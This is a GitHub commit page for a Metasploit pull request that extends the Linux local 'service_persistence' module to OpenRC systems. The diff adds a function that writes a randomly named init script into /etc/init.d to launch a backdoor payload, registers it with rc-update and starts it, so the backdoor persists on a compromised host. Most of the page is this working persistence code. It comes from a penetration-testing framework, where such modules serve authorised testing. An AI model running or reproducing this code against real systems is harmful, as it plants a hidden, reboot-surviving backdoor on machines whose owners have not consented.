Skip to content

Commit

Permalink
Land #19480 update service_persistence for openrc
Browse files Browse the repository at this point in the history
This updates exploits/linux/local/service_persistence.rb to work on systems that are running OpenRC
  • Loading branch information
jheysel-r7 authored Oct 2, 2024
2 parents 745f61e + 811678a commit 8d69720
Showing 1 changed file with 46 additions and 0 deletions.
46 changes: 46 additions & 0 deletions modules/exploits/linux/local/service_persistence.rb
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,11 @@ def initialize(info = {})
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['openrc', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['systemd', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
Expand Down Expand Up @@ -118,6 +123,8 @@ def exploit
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
when 'Upstart'
upstart(path, file, target.opts[:runlevel])
when 'openrc'
openrc(path, file)
when 'systemd'
systemd(path, file)
when 'systemd user'
Expand All @@ -131,6 +138,10 @@ def exploit
print_status('Utilizing Upstart')
upstart(path, file, '2345')
end
if service_system_exists?('openrc')
print_status('Utilizing openrc')
openrc(path, file)
end
has_updatercd = service_system_exists?('update-rc.d')
if has_updatercd || service_system_exists?('chkconfig') # centos 5
print_status('Utilizing System_V')
Expand Down Expand Up @@ -397,4 +408,39 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
cmd_exec("/etc/init.d/#{service_filename} start")
end
end

def openrc(backdoor_path, backdoor_file)
# https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
# https://wiki.alpinelinux.org/wiki/OpenRC
# https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
script = %{#!/sbin/openrc-run
name=#{backdoor_file}
command=/bin/sh
command_args="#{backdoor_path}/#{backdoor_file}"
pidfile="/run/${RC_SVCNAME}.pid"
command_background="yes"
}

service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
service_name = "/etc/init.d/#{service_filename}"
vprint_status("Writing service: #{service_name}")
begin
upload_and_chmodx(service_name, script)
rescue Rex::Post::Meterpreter::RequestError
print_error("Writing '#{service_name}' to the target and or changing the file permissions failed, ensure that directory exists?")
end

if !file_exist?(service_name)
print_error('File not written, check permissions.')
return
end

if datastore['EnableService']
vprint_status('Enabling service')
cmd_exec("rc-update add '#{service_filename}'")
end

vprint_status('Starting service')
cmd_exec("'/etc/init.d/#{service_filename}' start")
end
end

0 comments on commit 8d69720

Please sign in to comment.